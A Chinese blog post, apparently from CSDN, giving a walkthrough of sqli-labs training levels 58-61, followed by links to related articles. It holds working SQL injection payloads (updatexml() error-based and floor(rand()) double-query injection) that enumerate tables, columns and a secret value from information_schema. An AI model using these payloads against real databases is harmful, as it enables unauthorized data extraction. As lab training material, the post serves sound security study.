Less 58-61

最新推荐文章于 2022-06-28 11:29:39 发布
最新推荐文章于 2022-06-28 11:29:39 发布
阅读量385 收藏
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/107730836
版权

文章目录

1. 题目分析

本关提示的是测试次数不要超过5次,其实超过了也没有什么特别大的影响。
首先还是判断id的类型。

通过?id=1%27确定id是被''包裹的。
在这里插入图片描述
然后我们先测试一下能否使用联合注入。

当输入?id=-1%27 union select 1,2,3 --+发现结果如下
在这里插入图片描述
因此使用联合注入估计是没戏了。但是可以看到网站没有屏蔽掉报错的信息。
可以使用updatexml()注入和双注入。

2. 注入过程

2.1 updatexml()注入

  1. 获取表名

    ?id=3%27 union select 11,2,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --+

    在这里插入图片描述

  2. 获取字段

    ?id=3%27 union select 11,2,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=“fl4yb0lwyy”)),1) --+

    在这里插入图片描述

  3. 获取密钥

    ?id=3%27 union select 11,2,updatexml(1,concat(0x7e,(select group_concat(secret_M9TJ) from fl4yb0lwyy)),1) --+

    在这里插入图片描述
    然后提交:
    在这里插入图片描述
    在这里插入图片描述
    恭喜你,搞定了。

2.2 双注入

首先给出双注入的通用payload

?id=1%27 union select 1,2,(select count(*) from information_schema.tables group by(concat(0x7e,(select database()),floor(rand(0)*2)))) --+

  1. 查表明

    ?id=1%27 union select 1,2,(select count(*) from information_schema.tables group by(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)))) --+

  2. 查字段

    ?id=1%27 union select 1,2,(select count(*) from information_schema.tables group by(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=“samiuv28wp”),floor(rand(0)*2)))) --+

  3. 查密钥

    ?id=1%27 union select 1,2,(select count(*) from information_schema.tables group by(concat(0x7e,(select secret_UC0Z from samiuv28wp),floor(rand(0)*2)))) --+

    **这里需要注意的是,使用双注入报错的时候,此处使用group_concat()可能会影响报错。(原因不知),因此这里的尽量不要使用group_concat()
    **
    在这里插入图片描述

58-61的方法都是一样的,只有id的类型需要加以判断。

老司机开代码
关注
专栏目录
sqli-labs————Less-58
Fly_鹏程万里
05-22 983
Less-58源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
Sqli-labs之Less:58-61
→_→
06-01 1063
Less-58 基于错误_GET_单引号_字符型_双注入 因期末考试暂停更新,预计6月20日开始更新。
Sqli-labs 实战挑战注入篇 (Less54~65)
angry_program的博客
02-16 840
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 实战注入篇对应labs的54~75关: 与以往不同的是, 挑战篇更贴近实战。 Less-54 联合查询注入(十次限制) 接下来是很常规的操作了: 判断是整数型还是字符型注入: 当我们注入单引号的时候, 发现页面没有错误信息回显, 只是页面会变化(正常页面和错误界面): ...
线性秘密共享方案(LSSS)
09-30
介绍线性秘密共享方案(LSSS)相关知识,共享矩阵如何构造,加密,解密方法。
sqli-labs Less-58、59、60、61(sqli-labs闯关指南 58、59、60、61
m0_54899775的博客
12-30 1394
sqli-labs Less-58、59、60、61(sqli-labs闯关指南 58、59、60、61
sqli-lab教程——Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
luosaierdadi的博客
06-28 457
输入单引号,页面报错,如下图所示根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,猜想:咱们输入的1在数据库中出现的位置为:select ... from ... where id=’1’ ......,也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致,多余的步骤不多说了,直接开始爆数据吧。注意 id=非正确值爆库payload?id=-1' union select 1,2,database() --+得到‘security’库名爆表payload?id=-1' unio
在create-react-app中配置less
Hazel928的博客
01-20 445
首先在终端中写npm i --save-dev less less-loader。安装less、less-loader两个包 在终端中写npm run eject,暴露webpack。 在项目文件夹中会出现config文件夹,其中会有webpack.config.js文件。 在 webpack.config.js 中 “style files regexes” (58行) 添加 less ==》即照着Sass改一份Less的 const lessRegex = /\.less$/; const less.
sqli-labs学习笔记(Less1-Less24)
极光时流
02-07 1200
sqli-labs学习笔记Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8 Less-1 select … from … where id=’$id’ 基于union联合查询 http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ 报错 http://127.0.0.1/sqli-labs-master/Le...
sqli-labs学习笔记(十四)less 54-65 挑战
闵行小鱼塘
09-23 274
继续学习sqli-labs,本篇是less 54-65,至此,sqli-labs的学习告一段落
线性秘密共享方案(LSSS)矩阵的构造
hhh_2333
11-15 1万+
线性密钥分享方案(LSSS)矩阵的构造 基于属性加密(Attribute-Based Encryption, ABE)中有一个很重要的概念就是访问控制策略。具体到密文策略属性基加密(Ciphertext-Policy Attribute-Based Encryption, CP-ABE)方案中:方案存在着若干的属性,明文在一定的访问控制策略下被加密成密文;属性满足密文策略的用户就可以对密文进行解密。
使用less的适配方案
qq_38105960的博客
10-08 1485
rem布局原理 通过html上的字体大小控制页面上所有rem单位尺寸。 换算:预设一个基准值100px 基于640px设计尺寸 当适配320px的设备时的基准值:320/640100=50px 公式:当前设备的宽度/设计稿的宽度预设的基准值。 通过以上可编写一个适配方案,实现布局中元素的宽度大小随着页面大小等比列缩放。 ①index.less文件中代码,主要导入less文件 @import "va...
Less 28-28a
老司机开代码的博客
08-04 541
文章目录题目分析 题目分析 首先题目告诉我们会吃掉我们的union和select。 然后通过?id=1')%26%261=1;%00测试出来,id的是被('')包裹的。 接着看一下源码的blacklist function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_repl
LSSS线性秘密共享方案详细构造方法与原理解释试读
qq_41359358的博客
03-09 4750
关于LSSS 1 LSSS英文精确定义如下: 翻译后: 一个关于参与者集合P\RhoP关于秘密分享方案Π\PiΠ在ZpZ_pZp​上是线性的,则需要满足以下条件: 1.每一个参与者的分享份额(见2点)构成ZpZ_pZp​上的一个向量; 2.存在一个关于Π\PiΠ的秘密生成矩阵MMM,这个矩阵有mmm行ddd列,对于i=1,2,....mi=1,2,....mi=1,2,....m,MMM的第iii行MiM_iMi​被一个参与者ρ(i)\rho (i)ρ(i)标识,ρ\rhoρ是一个从{1,2,...,m}
线性秘密共享方案(LSSS)构造与解密
e小王同学V的博客
09-08 3万+
秘密共享体制自从Shamir和Blakley在1979年各自独立提出后(Shamir提出的方案基于插值法,Blakley提出的方案基于高斯消元法),作为现代密码学的重要工具之一,在实际中有很多应用。在信息系统中使用的秘密共享,可以防止系统密钥的遗失、损坏和来自地方的攻击,减小秘密保存者的责任。在(t,n)秘密共享体制中,秘密分发者将一个秘密信息分成n个秘密份额,分发给n个人,当需要恢复秘密信息时,任意少于t个的秘密保存者都得不到该秘密的任何信息。现目前进行秘密共享的主流方案有基于访问控制树和秘密共享矩阵的。
sqlmap使用教程大全命令大全(图文)
热门推荐
Cwillchris的博客
03-15 6万+
我们先准备一个靶机,我这里拿经典的SQL大观园靶机 我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1 接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1 一、SQLmap基础操作 1.判断是否存在注入 假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.
Less 62-65
老司机开代码的博客
08-04 415
文章目录1. 题目分析2. 注入过程 1. 题目分析 通过简单的测试发现,本关对报错信息进行了屏蔽。并且也无法使用联合查询。 但是通过/?id=1') and sleep(5) --+不仅判断出id的类型,同时发现存在盲注的漏洞。 而本关的限制次数为130,看似赋予,其实对于相对复杂的盲注来说,应该是比较紧张的。因此在判断字母ascii码的时候,就不能使用暴力破解的方法。需要尽可能利用二分法来判断字母的ascii码,这样使用的次数会比爆破的次数少的多。 2. 注入过程 我们已知数据库的名字为challen
Less 18 (请求头注入--user-agent注入)
老司机开代码的博客
08-03 2566
文章目录1. 题目分析2. 构造SQL3. 注入过程4. 使用python进行注入 1. 题目分析 首先我们来分析一下题目: 经过尝试,我们知道,当我们输入正确的用户名和密码的时候,后台会将User Agent返回到屏幕上。 那么根据目前的情况来看,可能存在的注入点有2个: 登录框 user-agent 我们先来看一下源代码: // uagent的接收是未经过严格过滤的 $uagent = $_SERVER['HTTP_USER_AGENT']; $IP = $_SERVER['REMOTE_ADDR
Less 5-6(双注入)
老司机开代码的博客
08-03 2038
文章目录1. Less-51.1 问题描述1.2 解法一:双注入破解1.2.1 双注入的过程1.2.2 双注入的原理(floor报错的原因)1. rand()生产随机数的原理2. floor(rand())如何分组1.3 解法二:布尔盲注2. Less-63. 小结 1. Less-5 1.1 问题描述 首先我们看一下题目 意思是考察SQL注入的双注入。 这里涉及到了一个关键的知识点,利用cou...
Vue面试必备:58道常见问题涵盖入门到精通
"这是一份关于Vue.js的面试题集,涵盖了从基础到进阶的58个常见问题,旨在帮助开发者全面检验Vue技能,包括Vue的优点、数据传递、条件渲染指令、DOM操作、组件化特性以及相关工具如vue-loader的使用等。" Vue.js...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值